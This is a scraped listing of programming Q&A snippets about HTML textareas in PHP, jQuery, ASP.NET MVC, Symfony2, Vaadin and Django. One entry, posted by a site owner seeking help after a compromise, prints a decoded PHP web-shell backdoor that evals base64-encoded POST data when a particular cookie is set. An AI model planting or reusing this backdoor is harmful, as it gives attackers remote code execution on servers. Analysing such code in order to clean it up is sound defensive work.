  • How to color HTML elements based on a user command string

    - by Anonymous the Great
    When you type something like "red:Hi:" it will type "Hi" in red. The following script does not work and I do not know why, (The one who made the sorting PHP function is Graphain, thanks again!) <?php function getit($raw) { # If the value was posted $raw = isset($raw) ? $raw : ""; # Split it based on ':' $parsed = explode(':', $raw); $colorClass = ""; $text = ""; if (count($parsed) >= 2) { $colorClass = $parsed[0]; $text = $parsed[1]; $text = "~~~" . $text . "~~~" . $colorClass; return $text; } } ?> <script type="text/javascript"> function postit() { var preview = document.getElementById("preview").value; var submit = document.getElementById("post").value; var text = <?php getit(submit); ?> var t = text[0]; preview = t; } </script> <textarea id="preview" cols=70 rows=5 readonly>Preview box</textarea> <p> <textarea id="post" cols=70 rows=5/>Submit box</textarea> <p> <input type="button" onclick="postit();" value="Submit"/>

  • My jQuery and PHP give different results on the same thing?

    - by Stefan
Hey all, Annoying brain numbing problem. I have two functions to check the length of a string (primarily, the js one truncates as well) heres the one in Javascript: $('textarea#itemdescription').keyup(function() { var charLength = $(this).val().length; // Displays count $('span#charCount').css({'color':'#666'}); $('span#charCount').html(255 - charLength); if($(this).val().length >= 240){ $('span#charCount').css({'color':'#FF0000'}); } // Alerts when 250 characters is reached if($(this).val().length >= 255){ $('span#charCount').css({'color':'#FF0000'}); $('span#charCount').html('<strong>0</strong>'); var text = $('textarea#itemdescription').val().substring(0,255) $('textarea#itemdescription').val(text); } }); And here is my PHP to double check: if(strlen($_POST["description"])>255){ echo "Description must be less than ".strlen($_POST["description"])." characters"; exit(); } I'm using jQuery Ajax to post the values from the textarea. However my php validation says the strlen() is longer than my js is essentially saying. So for example if i type a solid string and it says 0 or 3 chars left till 255. I then click save and the php gives me the length as being 261. Any ideas? Is it to do with special characters, bit sizes that js reads differently or misses out? Or is it to do with something else? Maybe its ill today!... :P Thanks, Stefan

  • Calling a jQuery method at declaration time, and then onEvent

    - by cesarsalazar
I've been writing JS (mainly jQuery) for quite a few months now, but today I decided to make my first abstraction as a jQuery method. I already have working code but I feel/know that I'm not doing it the right way, so I come here for some enlightenment. Note: Please do not reply that there's already something out there that does the trick as I already know that. My interest in this matter is rather educational. What my code is intended to do (and does): Limit the characters of a textfield and change the color of the counter when the user is approaching the end. And here's what I have: $(function(){ $('#bio textarea').keyup(function(){ $(this).char_length_validation({ maxlength: 500, warning: 50, validationSelector: '#bio .note' }) }) $('#bio textarea').trigger('keyup'); }) jQuery.fn.char_length_validation = function(opts){ chars_left = opts.maxlength - this.val().length; if(chars_left >= 0){ $(opts.validationSelector + ' .value').text(chars_left); if(chars_left < opts.warning){ $(opts.validationSelector).addClass('invalid'); } else{ $(opts.validationSelector).removeClass('invalid'); } } else{ this.value = this.value.substring(0, opts.maxlength); } } In the HTML: <div id="bio"> <textarea>Some text</textarea> <p class="note> <span class="value">XX</span> <span> characters left</span> </p> </div> Particularly I feel really uncomfortable binding the event each on each keyup instead of binding once and calling a method later. Also, (and hence the title) I need to call the method initially (when the page renders) and then every time the user inputs a character. Thanks in advance for your time :)

  • PHP hack files found - help decoding and identifying

    - by akc
I found a handful of hack files on our web server. I managed to de-obfuscate them a bit -- they all seem to have a part that decodes into a chunk that looks like: if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){if (!empty($_POST['c'])) {echo '<textarea rows=28 cols=80>'; $d=base64_decode(str_replace(' ','+',$_POST['c']));if($d) @eval($d); echo '</textarea>';}echo '<form action="" method=post><textarea cols=80 rows=28 name=c></textarea><br><input type=submit></form>';exit;} But this chunk (decoded above) is usually embedded into a larger code snippet. I've shared the code of one of the files in its entirety here: http://pastie.org/3753704 I can sort of see where this code is going, but definitely not an expert at PHP and could use some help figuring out more specifically what it's doing or enabling. Also, if anyone happens to be familiar with this hack, any information on how it works, and where the backdoor and other components of the hack may be hidden would be super helpful and greatly appreciated. I tried to Google parts of the code, to see if others have reported it, but only came up with this link: http://www.daniweb.com/web-development/php/threads/365059/hacked-joomla Thanks!

    - by user3717298
I need to set a text area in the html template and use it as a custom component in vaadin the html snippet is as below <table> <tr> <td> JUNK SENTENCE </td> <td> <div location="HEADIN"></div> <div location="Details"></div> <div location="Attachment"></div> </td> <td> <p>School of more than 50 students univer versities.</p> </td> </tr> </table> All the place holders are working and displays data but the "details" holder should be a text area. as the text is a lot over there so I tried the below way but it just turned the place holder to text vaadin could not manipulate / identify the "Details" place holder. I tried the below way i set - in side the text area tag. <textarea rows="4" cols="50"> </textarea> and again i tried this way too which also did not work. <textarea rows="4" cols="50" location="Details"> </textarea> Any guidance would be appreciated to solve this I am setting the needed values from a formfeildfactory and these values are set by implementing the Vaadin Custom field class(in case it helps some more to identify)

    - by Frank

  • mysql select update

    - by Tillebeck
Hi I have read quite a few selcet+update questions in here but cannot understand how to do it. So will have to ask from the beginning. I would like to update a table based on data in another table. Setup is like this: - TABLE a ( int ; string ) ID WORD 1 banana 2 orange 3 apple - TABLE b ( "comma separated" string ; string ) WORDS TEXTAREA 0 banana -> 0,1 0 orange apple apple -> BEST:0,2,3 ELSE 0,2,3,3 0 banana orange apple -> 0,1,2,3 Now I would like to for each word in TABLE a append ",a.ID" to b.WORDS like: SELECT id, word FROM a (for each) -> UPDATE b SET words = CONCAT(words, ',', a.id) WHERE b.textarea like %a.word% Or even better: replace the word found in b.textarea with ",a.id" so it is the b.textarea that ends up beeing a comma separeted string of id's... But I do not know if that is possible.

No problem I thought - seen this before so I put the ValidateInput(false) on the controller but no joy - I still get the error. page code in edit.aspx is: <% using (Html.BeginForm()){ % <!-- Gets replaced with TinyMCE, remember HTML in a textarea should be encoded --> <textarea id="elm1" name="mceText" rows="15" cols="80" style="width: 80%"> &lt;p&gt; This is some example text that you can edit inside the &lt;strong&gt;TinyMCE editor&lt;/strong&gt;. </textarea> <br /> <input type="submit" name="save" value="Submit" /> <input type="reset" name="reset" value="Reset" /> <%} % and Controller action is: [AcceptVerbs(HttpVerbs.Post)] [ValidateInput(false)] public ActionResult Edit(string mceText) { return View(); } Any thoughts - (I know the code is not complete) been trying this for hours but everyone just says to use ValidateInput(false)

  • How to use @FileUpload.GetHtml inside Html.BeginForm and sumbit FilesList

    - by Diode
There is a default submit button for the @FileUpload.GetHtml. But I am expecting to have a submit button inside the Html begin form and use that substitution to submit the list of files with some more parameters. But when I do that the passing IEnumerable is always null in the Action method. This is my Action method: [HttpPost] public ActionResult Change(IEnumerable filesList, Guid ID, string Btn) {.... @using (Html.BeginForm("Change", "Home",FormMethod.Post)) { <textarea id="textArea" name="epost2" class="frm_txtfield_big" style="float:left; width:638px; height:200px;"></textarea> <input type="hidden" name="supportID" value="@Model.ID" /> @FileUpload.GetHtml(name: "ChooseFile",initialNumberOfFiles: 1,allowMoreFilesToBeAdded: true, includeFormTag: false) .......} But this is not passing the list of files to the method. Am doing it wrong or what is the wrong with the code.

  • Integrating CKeditor to my symfony2 project

    - by Jishnu G Nair
I was trying to integrate ckeditor to my symfony2 project so that some of the textarea will have the ckeditor html editor. I brought the ckeditor on my required textarea by calling the class="ckeditor" in my form. The issue that I am facing now is that when I use the ckeditor the submit button of my form will not work instead I will have to use the built in "Save" option of the ckeditor toolbar for submitting the form. When I remove the ckeditor from the textareas and use normal textarea the submit button seems to work. I do not want to use the "Save" button on the ckeditor toolbar to submit my form. Is there a workaround to make the submit button work? Tried googling out for possible solutions but could not find any. P.S: I would also like to know if there are other html text editors like ckeditor that would work well with symfony2 and link to implementation instructions.

  • Will CSS attribute selector work to style this element?

    - by morktron
Hi, I have the following html: <div class="bf_form_row"> <label for="findout">Text goes here</label> <textarea class="findOut" cols="40" id="findout" name="findout" rows="10"></textarea> </div> I trying to work out how to style the 'label' element without being able to change the html. Ideally I'd like to style all 'label' elements that come before 'textarea' elements but I don't think it is possible using just CSS. I thought this attribute selector would work: label[for="findout"] { width: 100%; } but no, any ideas?

  • jQuery: move window viewport to show freshly toggled element

    - by k00k
I have a simple bit of jQuery in doc ready which toggles a div containing a textarea: $('div#addnote-area').hide(); // hide the div $('a#addnote-link').click(function() { // click event listener on link $('div#addnote-area').toggle(); // toggle the hidden div }); The toggle works fine when clicking the link. The problem I'm having is that if div#addnote-area is below the browser's current viewport, it remains there when it's shown. I'd like the user's cursor to go to the textarea and for the whole textarea to be viewable in the window. Click here to see an image for more context

  • How to read back and print text with newlines from a Python (Django) string with HTML?

    - by user1801486
If someone types in a phrase, such as: I see you driving round town with the girl I love, and I’m like: haiku. (no blank lines between each line, but the text is written on three separate lines) into a text box on a web page, and then presses a button which is then stored in a database via Django, and that string is read back and printed on a page, how can I get it to print on an HTML page with the newlines still in the text? So instead of it being printed back as: I see you driving round town with the girl I love, and I’m like: haiku. It would print as: I see you driving round town with the girl I love, and I’m like: haiku. I know that if I use: (textarea)soAndSo.body(/textarea), this preserves the newlines that were in the file when the user typed it up originally. How can I get this same effect, but without having to use textarea boxes?

How can I make it parse into regular text with the HTML markup when it hits the textArea? Thanks!
